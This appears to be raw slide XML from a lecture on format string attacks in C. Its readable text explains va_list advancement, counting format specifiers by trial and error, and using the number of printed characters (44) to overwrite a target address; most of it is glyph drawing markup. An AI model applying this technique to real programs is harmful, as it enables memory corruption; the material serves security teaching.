              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pointer to this location and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 to store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>some value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/>
              <a:t> is used to advance the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How many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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are required?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9D9F-3702-49A0-B20A-B37D4CB2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169">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0085A0C7-2BD3-4C05-B323-161BC2FA54C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0370" y="1228838"/>
            <a:ext cx="3379894" cy="268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57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3DFF-06F6-48EF-A373-4E73F034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Change program’s data in the memory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7641-4B7B-49D3-ACCE-A496E3D1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336961"/>
            <a:ext cx="8778240" cy="22936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trial and error, we check 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/>
              <a:t> are needed to print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Here we need 6 format specifiers, indicating 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/>
              <a:t> and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After the attack, data in the target address is modified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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (44 in decimal).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because 44 characters have been printed out before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1372A-277F-4FFB-9CFB-037405FF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246" name="Rectangle 2245">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE268607-2F43-4BA3-9746-E25C4EF5E2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825247" y="815815"/>
            <a:ext cx="7223378" cy="14166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000" name="Group 1999">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CD0B56-EF79-4464-8564-3CD2D7E4369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4252" y="863600"/>
            <a:ext cx="7016750" cy="1355726"/>
            <a:chOff x="1497012" y="603250"/>
            <a:chExt cx="7016750" cy="1355726"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1800" name="Freeform 1006">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19CCAD95-AB2F-410D-8DF2-AD1A9ABEF87B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508125" y="665163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7" y="114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1" name="Freeform 1007">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF82341-E0D0-4C05-9789-C7866CEE4649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604962" y="665163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10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2" name="Freeform 1008">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7186C9FA-718C-44B4-944B-941AB3BA2271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703387" y="665163"/>
              <a:ext cx="77788" cy="84138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3" name="Freeform 1009">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16053F30-2563-48EA-9860-148E53DE01C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00225" y="630238"/>
              <a:ext cx="90488" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 293 h 307"/>
                <a:gd name="T2" fmla="*/ 220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8 w 235"/>
                <a:gd name="T11" fmla="*/ 0 h 307"/>
                <a:gd name="T12" fmla="*/ 123 w 235"/>
                <a:gd name="T13" fmla="*/ 11 h 307"/>
                <a:gd name="T14" fmla="*/ 138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1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6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3 w 235"/>
                <a:gd name="T41" fmla="*/ 110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20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3" y="0"/>
                    <a:pt x="123" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123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7"/>
                    <a:pt x="122" y="89"/>
                    <a:pt x="101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59"/>
                    <a:pt x="44" y="307"/>
                    <a:pt x="96" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="307"/>
                    <a:pt x="143" y="294"/>
                    <a:pt x="166" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="298"/>
                    <a:pt x="166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6" y="210"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="240"/>
                    <a:pt x="141" y="286"/>
                    <a:pt x="98" y="286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="286"/>
                    <a:pt x="25" y="247"/>
                    <a:pt x="25" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="146"/>
                    <a:pt x="64" y="110"/>
                    <a:pt x="103" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="110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4" name="Freeform 1010">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B9CA24-67D7-4800-94F7-0B721896FB99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901825" y="628650"/>
              <a:ext cx="82550" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 271 h 310"/>
                <a:gd name="T2" fmla="*/ 200 w 214"/>
                <a:gd name="T3" fmla="*/ 262 h 310"/>
                <a:gd name="T4" fmla="*/ 190 w 214"/>
                <a:gd name="T5" fmla="*/ 264 h 310"/>
                <a:gd name="T6" fmla="*/ 129 w 214"/>
                <a:gd name="T7" fmla="*/ 289 h 310"/>
                <a:gd name="T8" fmla="*/ 18 w 214"/>
                <a:gd name="T9" fmla="*/ 155 h 310"/>
                <a:gd name="T10" fmla="*/ 128 w 214"/>
                <a:gd name="T11" fmla="*/ 21 h 310"/>
                <a:gd name="T12" fmla="*/ 189 w 214"/>
                <a:gd name="T13" fmla="*/ 75 h 310"/>
                <a:gd name="T14" fmla="*/ 145 w 214"/>
                <a:gd name="T15" fmla="*/ 57 h 310"/>
                <a:gd name="T16" fmla="*/ 76 w 214"/>
                <a:gd name="T17" fmla="*/ 155 h 310"/>
                <a:gd name="T18" fmla="*/ 144 w 214"/>
                <a:gd name="T19" fmla="*/ 252 h 310"/>
                <a:gd name="T20" fmla="*/ 214 w 214"/>
                <a:gd name="T21" fmla="*/ 147 h 310"/>
                <a:gd name="T22" fmla="*/ 128 w 214"/>
                <a:gd name="T23" fmla="*/ 0 h 310"/>
                <a:gd name="T24" fmla="*/ 0 w 214"/>
                <a:gd name="T25" fmla="*/ 155 h 310"/>
                <a:gd name="T26" fmla="*/ 129 w 214"/>
                <a:gd name="T27" fmla="*/ 310 h 310"/>
                <a:gd name="T28" fmla="*/ 214 w 214"/>
                <a:gd name="T29" fmla="*/ 271 h 310"/>
                <a:gd name="T30" fmla="*/ 196 w 214"/>
                <a:gd name="T31" fmla="*/ 155 h 310"/>
                <a:gd name="T32" fmla="*/ 145 w 214"/>
                <a:gd name="T33" fmla="*/ 231 h 310"/>
                <a:gd name="T34" fmla="*/ 94 w 214"/>
                <a:gd name="T35" fmla="*/ 155 h 310"/>
                <a:gd name="T36" fmla="*/ 144 w 214"/>
                <a:gd name="T37" fmla="*/ 78 h 310"/>
                <a:gd name="T38" fmla="*/ 196 w 214"/>
                <a:gd name="T3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4" h="310">
                  <a:moveTo>
                    <a:pt x="214" y="271"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="262"/>
                    <a:pt x="203" y="262"/>
                    <a:pt x="200" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="262"/>
                    <a:pt x="192" y="262"/>
                    <a:pt x="190" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="283"/>
                    <a:pt x="148" y="289"/>
                    <a:pt x="129" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="289"/>
                    <a:pt x="18" y="231"/>
                    <a:pt x="18" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="75"/>
                    <a:pt x="73" y="21"/>
                    <a:pt x="128" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="21"/>
                    <a:pt x="170" y="26"/>
                    <a:pt x="189" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="66"/>
                    <a:pt x="161" y="57"/>
                    <a:pt x="145" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="57"/>
                    <a:pt x="76" y="100"/>
                    <a:pt x="76" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="213"/>
                    <a:pt x="109" y="252"/>
                    <a:pt x="144" y="252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="252"/>
                    <a:pt x="214" y="231"/>
                    <a:pt x="214" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="115"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="128" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="0"/>
                    <a:pt x="0" y="65"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="244"/>
                    <a:pt x="60" y="310"/>
                    <a:pt x="129" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="310"/>
                    <a:pt x="214" y="285"/>
                    <a:pt x="214" y="271"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="196" y="155"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="201"/>
                    <a:pt x="169" y="231"/>
                    <a:pt x="145" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="231"/>
                    <a:pt x="94" y="199"/>
                    <a:pt x="94" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="108"/>
                    <a:pt x="121" y="78"/>
                    <a:pt x="144" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="78"/>
                    <a:pt x="196" y="110"/>
                    <a:pt x="196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5" name="Freeform 1011">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A624F2A-1BB7-4B6E-9849-0AF4EF3C1E8E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997075" y="630238"/>
              <a:ext cx="92075" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 241 w 241"/>
                <a:gd name="T1" fmla="*/ 10 h 308"/>
                <a:gd name="T2" fmla="*/ 225 w 241"/>
                <a:gd name="T3" fmla="*/ 0 h 308"/>
                <a:gd name="T4" fmla="*/ 173 w 241"/>
                <a:gd name="T5" fmla="*/ 0 h 308"/>
                <a:gd name="T6" fmla="*/ 157 w 241"/>
                <a:gd name="T7" fmla="*/ 10 h 308"/>
                <a:gd name="T8" fmla="*/ 187 w 241"/>
                <a:gd name="T9" fmla="*/ 21 h 308"/>
                <a:gd name="T10" fmla="*/ 123 w 241"/>
                <a:gd name="T11" fmla="*/ 287 h 308"/>
                <a:gd name="T12" fmla="*/ 119 w 241"/>
                <a:gd name="T13" fmla="*/ 288 h 308"/>
                <a:gd name="T14" fmla="*/ 54 w 241"/>
                <a:gd name="T15" fmla="*/ 21 h 308"/>
                <a:gd name="T16" fmla="*/ 85 w 241"/>
                <a:gd name="T17" fmla="*/ 10 h 308"/>
                <a:gd name="T18" fmla="*/ 69 w 241"/>
                <a:gd name="T19" fmla="*/ 0 h 308"/>
                <a:gd name="T20" fmla="*/ 16 w 241"/>
                <a:gd name="T21" fmla="*/ 0 h 308"/>
                <a:gd name="T22" fmla="*/ 0 w 241"/>
                <a:gd name="T23" fmla="*/ 10 h 308"/>
                <a:gd name="T24" fmla="*/ 29 w 241"/>
                <a:gd name="T25" fmla="*/ 21 h 308"/>
                <a:gd name="T26" fmla="*/ 97 w 241"/>
                <a:gd name="T27" fmla="*/ 293 h 308"/>
                <a:gd name="T28" fmla="*/ 121 w 241"/>
                <a:gd name="T29" fmla="*/ 308 h 308"/>
                <a:gd name="T30" fmla="*/ 144 w 241"/>
                <a:gd name="T31" fmla="*/ 293 h 308"/>
                <a:gd name="T32" fmla="*/ 213 w 241"/>
                <a:gd name="T33" fmla="*/ 21 h 308"/>
                <a:gd name="T34" fmla="*/ 241 w 241"/>
                <a:gd name="T35" fmla="*/ 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1" h="308">
                  <a:moveTo>
                    <a:pt x="241" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="0"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="225" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="0"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="157" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="21"/>
                    <a:pt x="166" y="21"/>
                    <a:pt x="187" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123" y="287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="21"/>
                    <a:pt x="85" y="21"/>
                    <a:pt x="85" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="0"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="69" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="10" y="21"/>
                    <a:pt x="29" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="293"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="308"/>
                    <a:pt x="108" y="308"/>
                    <a:pt x="121" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="308"/>
                    <a:pt x="140" y="308"/>
                    <a:pt x="144" y="293"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="213" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="21"/>
                    <a:pt x="241" y="21"/>
                    <a:pt x="241" y="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6" name="Freeform 1012">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB52A7AE-810B-423B-9B5B-4ADF1D739FFF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097087" y="630238"/>
              <a:ext cx="92075" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 242 w 242"/>
                <a:gd name="T1" fmla="*/ 295 h 305"/>
                <a:gd name="T2" fmla="*/ 215 w 242"/>
                <a:gd name="T3" fmla="*/ 284 h 305"/>
                <a:gd name="T4" fmla="*/ 215 w 242"/>
                <a:gd name="T5" fmla="*/ 22 h 305"/>
                <a:gd name="T6" fmla="*/ 242 w 242"/>
                <a:gd name="T7" fmla="*/ 11 h 305"/>
                <a:gd name="T8" fmla="*/ 227 w 242"/>
                <a:gd name="T9" fmla="*/ 1 h 305"/>
                <a:gd name="T10" fmla="*/ 198 w 242"/>
                <a:gd name="T11" fmla="*/ 1 h 305"/>
                <a:gd name="T12" fmla="*/ 174 w 242"/>
                <a:gd name="T13" fmla="*/ 18 h 305"/>
                <a:gd name="T14" fmla="*/ 122 w 242"/>
                <a:gd name="T15" fmla="*/ 179 h 305"/>
                <a:gd name="T16" fmla="*/ 121 w 242"/>
                <a:gd name="T17" fmla="*/ 179 h 305"/>
                <a:gd name="T18" fmla="*/ 66 w 242"/>
                <a:gd name="T19" fmla="*/ 10 h 305"/>
                <a:gd name="T20" fmla="*/ 44 w 242"/>
                <a:gd name="T21" fmla="*/ 1 h 305"/>
                <a:gd name="T22" fmla="*/ 16 w 242"/>
                <a:gd name="T23" fmla="*/ 1 h 305"/>
                <a:gd name="T24" fmla="*/ 0 w 242"/>
                <a:gd name="T25" fmla="*/ 11 h 305"/>
                <a:gd name="T26" fmla="*/ 28 w 242"/>
                <a:gd name="T27" fmla="*/ 22 h 305"/>
                <a:gd name="T28" fmla="*/ 28 w 242"/>
                <a:gd name="T29" fmla="*/ 284 h 305"/>
                <a:gd name="T30" fmla="*/ 0 w 242"/>
                <a:gd name="T31" fmla="*/ 295 h 305"/>
                <a:gd name="T32" fmla="*/ 16 w 242"/>
                <a:gd name="T33" fmla="*/ 305 h 305"/>
                <a:gd name="T34" fmla="*/ 58 w 242"/>
                <a:gd name="T35" fmla="*/ 305 h 305"/>
                <a:gd name="T36" fmla="*/ 73 w 242"/>
                <a:gd name="T37" fmla="*/ 295 h 305"/>
                <a:gd name="T38" fmla="*/ 46 w 242"/>
                <a:gd name="T39" fmla="*/ 284 h 305"/>
                <a:gd name="T40" fmla="*/ 46 w 242"/>
                <a:gd name="T41" fmla="*/ 22 h 305"/>
                <a:gd name="T42" fmla="*/ 50 w 242"/>
                <a:gd name="T43" fmla="*/ 22 h 305"/>
                <a:gd name="T44" fmla="*/ 106 w 242"/>
                <a:gd name="T45" fmla="*/ 194 h 305"/>
                <a:gd name="T46" fmla="*/ 121 w 242"/>
                <a:gd name="T47" fmla="*/ 200 h 305"/>
                <a:gd name="T48" fmla="*/ 138 w 242"/>
                <a:gd name="T49" fmla="*/ 192 h 305"/>
                <a:gd name="T50" fmla="*/ 193 w 242"/>
                <a:gd name="T51" fmla="*/ 22 h 305"/>
                <a:gd name="T52" fmla="*/ 197 w 242"/>
                <a:gd name="T53" fmla="*/ 22 h 305"/>
                <a:gd name="T54" fmla="*/ 197 w 242"/>
                <a:gd name="T55" fmla="*/ 284 h 305"/>
                <a:gd name="T56" fmla="*/ 169 w 242"/>
                <a:gd name="T57" fmla="*/ 295 h 305"/>
                <a:gd name="T58" fmla="*/ 185 w 242"/>
                <a:gd name="T59" fmla="*/ 305 h 305"/>
                <a:gd name="T60" fmla="*/ 227 w 242"/>
                <a:gd name="T61" fmla="*/ 305 h 305"/>
                <a:gd name="T62" fmla="*/ 242 w 242"/>
                <a:gd name="T63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2" h="305">
                  <a:moveTo>
                    <a:pt x="242" y="295"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="284"/>
                    <a:pt x="233" y="284"/>
                    <a:pt x="215" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="22"/>
                    <a:pt x="242" y="22"/>
                    <a:pt x="242" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="1"/>
                    <a:pt x="232" y="1"/>
                    <a:pt x="227" y="1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="1"/>
                    <a:pt x="177" y="7"/>
                    <a:pt x="174" y="18"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="10"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="50" y="1"/>
                    <a:pt x="44" y="1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1"/>
                    <a:pt x="0" y="1"/>
                    <a:pt x="0" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="28" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28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58" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="305"/>
                    <a:pt x="73" y="305"/>
                    <a:pt x="73" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="284"/>
                    <a:pt x="64" y="284"/>
                    <a:pt x="46" y="284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="194"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="199"/>
                    <a:pt x="117" y="200"/>
                    <a:pt x="121" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="200"/>
                    <a:pt x="136" y="198"/>
                    <a:pt x="138" y="192"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="193" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="284"/>
                    <a:pt x="169" y="284"/>
                    <a:pt x="169" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="305"/>
                    <a:pt x="179" y="305"/>
                    <a:pt x="185" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="227" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="305"/>
                    <a:pt x="242" y="305"/>
                    <a:pt x="242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7" name="Freeform 1013">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485706DE-8710-4BCC-9742-5860B400EC9E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205037" y="612775"/>
              <a:ext cx="77788" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 200 w 200"/>
                <a:gd name="T1" fmla="*/ 264 h 390"/>
                <a:gd name="T2" fmla="*/ 111 w 200"/>
                <a:gd name="T3" fmla="*/ 178 h 390"/>
                <a:gd name="T4" fmla="*/ 111 w 200"/>
                <a:gd name="T5" fmla="*/ 61 h 390"/>
                <a:gd name="T6" fmla="*/ 173 w 200"/>
                <a:gd name="T7" fmla="*/ 104 h 390"/>
                <a:gd name="T8" fmla="*/ 164 w 200"/>
                <a:gd name="T9" fmla="*/ 119 h 390"/>
                <a:gd name="T10" fmla="*/ 182 w 200"/>
                <a:gd name="T11" fmla="*/ 137 h 390"/>
                <a:gd name="T12" fmla="*/ 200 w 200"/>
                <a:gd name="T13" fmla="*/ 117 h 390"/>
                <a:gd name="T14" fmla="*/ 111 w 200"/>
                <a:gd name="T15" fmla="*/ 40 h 390"/>
                <a:gd name="T16" fmla="*/ 111 w 200"/>
                <a:gd name="T17" fmla="*/ 16 h 390"/>
                <a:gd name="T18" fmla="*/ 100 w 200"/>
                <a:gd name="T19" fmla="*/ 0 h 390"/>
                <a:gd name="T20" fmla="*/ 89 w 200"/>
                <a:gd name="T21" fmla="*/ 16 h 390"/>
                <a:gd name="T22" fmla="*/ 89 w 200"/>
                <a:gd name="T23" fmla="*/ 40 h 390"/>
                <a:gd name="T24" fmla="*/ 0 w 200"/>
                <a:gd name="T25" fmla="*/ 119 h 390"/>
                <a:gd name="T26" fmla="*/ 89 w 200"/>
                <a:gd name="T27" fmla="*/ 199 h 390"/>
                <a:gd name="T28" fmla="*/ 89 w 200"/>
                <a:gd name="T29" fmla="*/ 329 h 390"/>
                <a:gd name="T30" fmla="*/ 26 w 200"/>
                <a:gd name="T31" fmla="*/ 280 h 390"/>
                <a:gd name="T32" fmla="*/ 35 w 200"/>
                <a:gd name="T33" fmla="*/ 264 h 390"/>
                <a:gd name="T34" fmla="*/ 18 w 200"/>
                <a:gd name="T35" fmla="*/ 246 h 390"/>
                <a:gd name="T36" fmla="*/ 0 w 200"/>
                <a:gd name="T37" fmla="*/ 267 h 390"/>
                <a:gd name="T38" fmla="*/ 89 w 200"/>
                <a:gd name="T39" fmla="*/ 350 h 390"/>
                <a:gd name="T40" fmla="*/ 89 w 200"/>
                <a:gd name="T41" fmla="*/ 374 h 390"/>
                <a:gd name="T42" fmla="*/ 100 w 200"/>
                <a:gd name="T43" fmla="*/ 390 h 390"/>
                <a:gd name="T44" fmla="*/ 111 w 200"/>
                <a:gd name="T45" fmla="*/ 374 h 390"/>
                <a:gd name="T46" fmla="*/ 111 w 200"/>
                <a:gd name="T47" fmla="*/ 350 h 390"/>
                <a:gd name="T48" fmla="*/ 200 w 200"/>
                <a:gd name="T49" fmla="*/ 264 h 390"/>
                <a:gd name="T50" fmla="*/ 89 w 200"/>
                <a:gd name="T51" fmla="*/ 174 h 390"/>
                <a:gd name="T52" fmla="*/ 22 w 200"/>
                <a:gd name="T53" fmla="*/ 117 h 390"/>
                <a:gd name="T54" fmla="*/ 89 w 200"/>
                <a:gd name="T55" fmla="*/ 61 h 390"/>
                <a:gd name="T56" fmla="*/ 89 w 200"/>
                <a:gd name="T57" fmla="*/ 174 h 390"/>
                <a:gd name="T58" fmla="*/ 177 w 200"/>
                <a:gd name="T59" fmla="*/ 266 h 390"/>
                <a:gd name="T60" fmla="*/ 111 w 200"/>
                <a:gd name="T61" fmla="*/ 329 h 390"/>
                <a:gd name="T62" fmla="*/ 111 w 200"/>
                <a:gd name="T63" fmla="*/ 204 h 390"/>
                <a:gd name="T64" fmla="*/ 177 w 200"/>
                <a:gd name="T65" fmla="*/ 26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0">
                  <a:moveTo>
                    <a:pt x="200" y="264"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="241"/>
                    <a:pt x="186" y="192"/>
                    <a:pt x="111" y="178"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="64"/>
                    <a:pt x="163" y="72"/>
                    <a:pt x="173" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="109"/>
                    <a:pt x="164" y="114"/>
                    <a:pt x="164" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="128"/>
                    <a:pt x="171" y="137"/>
                    <a:pt x="182" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="137"/>
                    <a:pt x="200" y="132"/>
                    <a:pt x="200" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="79"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="111" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="111" y="16"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="10"/>
                    <a:pt x="111" y="0"/>
                    <a:pt x="100" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="0"/>
                    <a:pt x="89" y="10"/>
                    <a:pt x="89" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89" y="40"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="47"/>
                    <a:pt x="0" y="83"/>
                    <a:pt x="0" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="3" y="183"/>
